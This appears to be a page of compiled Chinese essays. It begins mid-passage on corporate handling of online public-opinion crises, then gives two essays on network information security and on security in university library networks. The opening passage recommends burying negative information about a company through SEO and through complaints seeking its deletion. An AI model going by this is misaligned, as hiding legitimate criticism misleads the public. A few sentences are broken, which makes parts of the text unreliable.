员也是游刃有余的处理问题,而不是刚开始的慌乱不知所措。对于负面信息如何压制,企业营销人员可以通过seo的手段进行压制,也可以通过投诉举报等方法进行删除(符合国家法律规范的前提下,或者寻求相关网路公关团队的帮助。

第三、实施监督、有的放矢

那处理好这些问题,就会意味着负面信息处理工作的结束?长沙乐客网络公关公司提醒,事实并非如此。因为网络信息瞬息万变,有可能刚刚处理完的负面信息又死灰复燃,如果你一时大意,就会让这个工作增加新的麻烦。企业营销人员还要随时监督企业其他方面的信息,以防止新的负面消息的出现。

互联网时代的到来,使得不管是传统企业还是新兴企业,既面临着机遇也面临着挑战。企业成功的一个关键是品牌信赖与责任,而企业网络舆情危机就直指企业的品牌信赖与责任。企业舆情应对得当,可以“柳暗花明”;应对失利,其遭受的打击不言而喻。因此,企业有必要加强其网络舆情的监测和管理。

具体的网络舆情的监测和管理流程如下: 1.建立网络舆情监测体系

为了更好地进行对网络舆情的监测和管理,首先,企业应按照体系化建设要求,设立专门的舆情管理部门,包括建立系统完备的新闻发言人制度和人才培育计划。同时完善信息储备,要在平时就做好信息储备工作,例如,在日常工作中要有意识地发现并对各类信息素材进行收集积累,做好声像、文字资料的记录和存储。企业必须将舆情监测和管理从舆情消防

员的角色定位中摆脱出来,不能等到舆情事件爆发之后才采取措施应对,在日常就应该进行舆情监测和管理。

对于企业出现的负面舆情,一方面企业要注重负面信息的采集与分析,企业相关部门必须紧密关注媒体上出现的关于企业的信息,建立起高效的舆情监测系统。另一方面企业要建立网络舆情危机预案,制定企业网络舆情危机预警机制,将舆情危机划分为不同等级,并且每个等级的网络舆情危机都设置相应的不同级别、部门、范围的力量参与到应对工作中,根据舆情预警的程度进行人员的调动和资源的整合。

2.积极回应面对网络舆情危机

对于企业的网络舆情危机,要第一时间启动应急预案。及时划分舆情危机的等级类别,在第一时间将相关情况上报上级和主管部门,随时关注舆情危机的等级变化,并启动与之相应的应急预案。通过立体化的媒介载体采用新闻发布会、在官方网站、官方微博发布消息等形式,针对公众最为关心、质疑最多的问题第一时间提供相关信息并进行详细解答,掌握主动权。如果是企业自身问题所导致的网络舆情危机,企业应该立即态度诚恳地进行道歉,并主动承担责任,拿出令大众满意的解决方案以争取谅解,让他们感受到企业解决问题的诚意和积极的态度。同时引入第三方信源形成权威效应,请第三方信源意见领袖发表有见地、有代表性的言论,消除网络舆情危机中的信息盲点。

随着真相的进一步澄清或企业的解决措施到位,会在一定程度上提高企业舆情的稳定性。在舆情已经产生稳定的社会影响的前提下。企业上下要统一资源、统一口径,随着舆情的稳定与成型,特别是企业的领导干部,要从大局、企业自身责任和社会责任的高度不断深化舆情引导的战略定位。

3.事后进行评估和善后

在企业网络舆情危机消退后,对于本次舆情应对工作的成效,企业应进行阶段性的总结和回顾。

对于企业网络舆情危机,要进行损失评估。企业网络舆情危机进入消退期后,企业应成立损失评估小组,对企业此次舆情危机所导致的损失进行评估。评估主要包括两方面:第一是现行经营状况造成的损失的评估;第二是对由于企业品牌和声誉造成影响将会产生的后续无形损失进行评估。同时要进行企业形象修复。经过负面舆情的不利影响,企业已经遭受并将面临巨大的损失。此时,迫切需要开启一系列企业形象修复工程,为负面舆情善后。要对产品及企业形象进行重新定位。重新定位企业的产品,严把产品质量关,让企业生产的产品成为“信得过”、“靠得住”产品,定期将产品的质量检测结果向民众公布,以使民众对产品重拾信心。

在企业的经营和管理创新中,正确地实施网络舆情监测和管理,对于促进企业发展有着至关重要的作用。企业要科学把握互联网时代信息传播的规律,用更加符合时代趋势的观念来看待网络舆情,深度利用各种传播媒介,扬长避短使之形成合力,使网络舆情成为促进企业持续和谐发展的强大生产力。

篇7:信息网络论文

从而保护信息安全隐私不被泄露以及篡改。信息技术不被恶意篡改以及使用,就要加大对计算机系统安全的保护措施以及力度。在传输过程中要对传输文件进行保护以及加强。从而使得计算机硬件具有可靠的性能以及安全正常的运行。技术上要对计算机网络运行软件以及硬件和运行等三个方面进行处理。在相应的问题上,也要对计算机的密码技术以及信息控制等进行有效的处理。从而使得信息安全管理技术得到全面的管理。在计算机的目标要求上讲,计算机的首要目标是保证信息的准确性。在信息的生成以及信息的传输使用中要不被恶意篡改。即使被恶意进行篡改后,也能根据相关的数据和软件进行恢复。信息的准确性关键是信息发布者能够在一定程度上进行了解以及确保信息表达的准确性以及安全概念。信息安全管理中实现的目标是使得信息不易被泄露,保护信息的隐私和安全性能。在信息管理中,保证用户的重要数据不会丢失,在信息丢失后能够通过安全可靠的软件进行恢复,在信息数据传输的过程中,能够保证信息有效的进行输送,保证信息在安全的系统下进行,人为破坏时,能够进行及时的拦截以及技术处理。

2技术管理与社会管理存在的技术分歧

信息网络安全中,并非拥有技术控制以及在技术控制前提上的综合性技术装置就能解决其问题。在解决问题的同时,还要进行进一步的社会管理。社会管理系统对计算机网络安全有着相对重要的意义。网络信息过程就是信息技术以及计算机技术综合一体实现的功能。在技术方面,同科学技术相仿,是综合性的社会功能实现以及运用的过程。在技术研发以及技术提供中,都需要一个与其相对应的社会管理体系来进行实现以及保障。在技术的实现以及技术综合来讲,信息技术具有相对的开放性和动态性以及传输和使用的海量性,在网络的开放性能以及互动性能中,对社会的管理以及稳定性的维护具有重要的意义。对信息技术进行安全管理在一定程度上能促进社会经济的发展。在信息安全管理中,很可能会出现与社会管理相冲突以及一致的方面。在一定程度上会存在求同存异的关系,也在相应的程度上产生冲突和相互的不一致。原因是由于两者的不同环境以及不同的形式所造成。技术管理与社会管理中,社会管理的要求目标更为明确。在相应程度上,社会管理相对于技术管理显得更加有力度。使得技术控制在一定程度上要依附于社会管理的相关要求。

网络信息管理技术与社会管理在基本能源上都是相同的。在信息网络管理与社会管理中,其归根结底都是为人服务的。对管理的充分认识,在一定程度上有利于其对信息安全技术管理的认识。有助于人们能有效的避免网络技术给人带来的科技异化问题。即人制造的科学在使用中会对人进行控制。在控制中在一定程度上对人产生了影响。在信息管理以及社会管理中,要有一个相对清晰的区分,并在一定程度上消除其存在的内在纠纷。使得其能够更好地为人类服务。网络信息具有一定程度的开放性,还具有相应的动态性以及互动性,在使用中容易受到现实社会的阻力。究其根本来讲,网络信息的动态性以及互动性有助于更好的实现社会管理。在网络技术管理与社会管理中,存在着一定程度的矛盾。在相互互动的过程中,使得网络信息技术在程度上对社会管理要处于弱势。在一方面使得网络信息管理在管理的权限中会相对增大,网络信息管理在相应程度上使得社会管理的服务所引导以及限制的可能。从而会使得网络信息管理中存在着弱化以及影响。

3网络信息管理的国际合作探讨

国际网络服务为用户服务已持续将近。在20年里,在用户数量以及信息的容量上都存在着飞速的跨越发展。在相应的程度上使得网络信息技术变得越来越重要。由于网络信息技术的快速发展,网络的信息和安全管理变得尤为重要。现阶段,网络的安全管理以及发展仍旧是一个新的事物。网络信息安全是国际性的问题,因此加强信息管理十分重要。

4结语

网络信息管理是当今的重要问题。在进行互联网以及计算机的管理过程中,要致力于消除网络管理主体之间的相对分歧。增加其相互的信任,主动承担应有的责任。网络安全管理要与社会管理相适应。在一定的程度上使得其能发挥良好的效益。进行网络的安全管理工作中,要充分的研究其数据以及安全信息保护功能,从而促进信息管理的加速发展。

参考文献

[1]何悦,郑文娟。我国网络信息安全立法研究[J]。科技与法律,(1):747。

[2]王华楠。浅谈网络信息安全面临的问题及对策[J]。中国电子商务,2011(12):132。

篇8:信息网络论文

随着计算机网络与通信技术的高速发展, 计算机越来越多地应用到社会生产与生活的众多领域, 近年来国内高校自动化与网络化建设不断发展, 数字化图书馆建设也迅速发展起来。但网络如同一把双刃剑, 网络环境在带给高校图书馆巨大变革, 实现网络信息资源的共建共享的同时, 让我们必须同时面对网络的开放性所带来的方方面面的安全问题, 如病毒泛滥、系统漏洞增多、黑客入侵攻击等。

高校图书馆数字化建设过程中, 馆藏文献资源体系结构不断向数字化、网络化多元化发展, 网络信息资源的共享性, 使信息资源得以分散, 减轻了图书馆信息资源承载负荷, 节约了大量的人力、物力和财力, 提高了工作效率, 但网络信息资源的分散共享性又导致了网络的脆弱性、复杂性以及网络受到各种攻击的可能性。因此, 如何保障图书馆网络安全高效运行, 成为高校图书馆自动化网络化建设进程中必须面对的关键问题。

1 图书馆网络安全影响因素分析

1.1 计算机病毒

计算机病毒, 是在计算机程序中插入的破坏计算机功能或者破坏数据, 影响计算机使用并且能够自我复制的一组计算机指令或者程序代码。计算机病毒具有繁殖性、传染性、潜伏性、隐蔽性、破坏性以及可触发性等特点, 曾出现过的CIH、熊猫烧香等病毒均对社会造成过巨大的经济损失[1]。计算机病毒是高校图书馆面临的一大威胁, 一旦感染或侵入, 病毒便可不断繁殖、扩散到到内部工作网上的各台计算机, 这将可能导致整个图书馆网络在短时间内陷入瘫痪, 致使所有网络服务无法开展, 甚至还会毁坏数据及网络设备, 给高校图书馆造成巨大的经济损失。

1.2 软件因素

图书馆网络系统的软件因素, 涉及到操作系统软件和图书馆管理自动化应用软件两个层面。操作系统方面, 目前高校图书馆主要使用的是Unix、Windows NT、Windows 2003Server等, 无论是哪一种系统, 都会不可避免地存在一些漏洞, 而这都容易遭受计算机病毒或其它人为因素的破坏[2]。在图书馆自动化管理应用软件方面, 目前各高校图书馆所采用的管理软件各不相同, 开发水平、软件成熟度上便各有不同, 因而在安全性能上存在差异。如果所选用的管理软件开发水平不够高、安全性能不足, 便会在安全方面存在各种各样的隐患。

1.3 网络环境因素

在高校图书馆的自动化网络化建设进程中, 网络设备所处环境必须作为一个不可忽视的环节。网络设备通常对其所处的物理环境都有较高的要求, 部分高校图书馆在网络化建设中或多或少地存在着重视网络硬件设备而忽略网络外部环境建设的问题。网络设备除防水、防火、防震等常规要求外, 对所处环境的温度、湿度、空气质量、静电和电磁干扰等物理条件也有严格要求, 忽略这些环境因素, 都将对图书馆后续的网络信息安全留下隐患。

1.4 管理制度因素

在高校图书馆的自动化网络建设进程中, 在解决计算机网络安全问题时, 非技术性措施如管理因素在整个计算机网络管理中也是至关重要的。管理因素主要包括了相关制度的健全性、分工的明确性、相关监督措施的力度等方面, 图书馆网络平台的正常运转, 必须以完善的管理制度作为前提与保障。有的高校图书馆正是因为没有健全严格的管理制度, 导致馆内计算机网络时断时续, 严重影响图书馆各项服务的正常开展, 因此, 仅有符合要求的网络硬件环境, 如果管理水平低下, 管理缺乏力度, 图书馆的网络信息安全也得不到保障。

2 图书馆网络安全问题应对策略

2.1 严防网络病毒

我们对计算机病毒并不陌生, 计算机病毒在网络中泛滥已久, 计算机病毒一旦感染, 通常会在局域网中快速繁殖, 致使局域网内计算机间的相互感染[3]。应考虑将业务工作局域网与校园网隔离开来, 在其接口处架设硬件防火墙, 来保证内外网间通信的安全性;对任何文件的使用, 必须先利用最新反病毒软件检测, 一旦发现病毒及时查杀;对所安装的反病毒软件应及时更新, 对系统应进行定时全面检测, 以及时发现并清除病毒;高校图书馆的馆藏数据有其特殊的动态性, 它直接反映了本馆馆藏文献资源的流动状况, 因此, 对馆藏数据应做好定期备份, 以避免其遭受网络病毒的入侵。

2.2 建立规范化网络技术体系

高校图书馆业务工作网络安全, 是图书馆业务系统和数据信息得以保存并可靠运行的支撑, 为了保证其安全稳定地运行, 防止非法人员访问、防止数据泄漏和丢失和防止非法数据进入, 就必须建立一套规范化的网络技术保障体系。必须为系统设置开机口令、软件口令以及特殊操作口令等一系列口令体系, 且在使用过程中要定期更换;对于重要服务器须采用单独网段进行隔离、身份鉴别、备份及恢复等应急措施进行有效防护;对图书馆日常数据的备份工作必须严格执行, 对于服务器可通过磁盘备份工具实现双机热备, 此外还应定期对数据进行机外备份, 将数据异地存放, 为整个网络系统数据的安全性提供保证。

2.3 做好网络环境建设

网络设备通常对其所处的物理环境都有较高的要求, 部分高校图书馆在网络化建设中或多或少地存在着重视网络硬件设备而忽略网络外部环境建设的问题。在良好的网络环境下, 网络设备的使用寿命可以更长, 且网络的安全稳定性能也可大大提高[4]。在网络机房位置的选择上, 应避开污染源和强电场等不良环境, 机房的内部装修应要具有较高的防火、防水、防尘、抗静电、防雷击及抗磁场干扰等功能;在机房的内部配置上, 应具备自动火灾报警消防系统、干粉灭火器、空调设备, 电源应选专线, 且应该有良好的接地线和漏电保护装置等。

2.4 健全网络安全管理制度

高校图书馆在文献信息资源及网络体系建设方面, 投入了大量的人力、物力和财力, 但如果缺少一个完善的网络安全管理制度, 任何先进网络产品都无法有效发挥作用。因此, 高校图书馆应逐步完善业务工作网络安全管理制度, 包括机房管理、软硬件维护管理、网络安全管理、系统安全管理、电子阅览室管理、备份和恢复管理、安全事件报告和处置方面的管理、应急响应方法、应急响应计划等制度, 并建立完善的跟踪体系, 做到职责明确, 责任到人, 在实现网络信息资源共建、共知、共享的基础上, 保障数字资源及信息系统业务的可持续性。

3 结语

高校图书馆网络信息安全是一项综合因素众多、技术含量很高的复杂工程。保护高校图书馆的网络信息安全是图书馆员义不容辞的责任, 当然, 要彻底消除各种安全问题是不可能的, 只能通过各种方式来加以防范, 图书馆网络安全依赖于相关信息技术的进步, 同时也依赖于管理制度的不断完善以及人员素质的全面提升。S

摘要:高校图书馆是高等学校的文献信息中心, 目前图书馆网络信息安全问题越来越受到人们的重视。对目前威胁高校图书馆网络信息安全的因素作了较为全面的分析, 并结合自身实践针对性地提出了相应的应对策略。

关键词:高校图书馆,信息资源,网络安全

参考文献

[1]赵晓红, 雒伟群, 刘伟光.高校图书馆网络安全分析与防护策略[J].计算机与信息技术, 2009 (3) .

[2]李太芳.高校图书馆网络安全防范技术探析[J].产业与科技论坛, 2009 (8) .

[3]王应, 刘子辉.当前高校图书馆网络安全问题分析与对策[J].重庆科技学院学报:社会科学版, 2011 (17) :151.

上一篇:小明的一天反思下一篇:《中国传统管理智慧》教案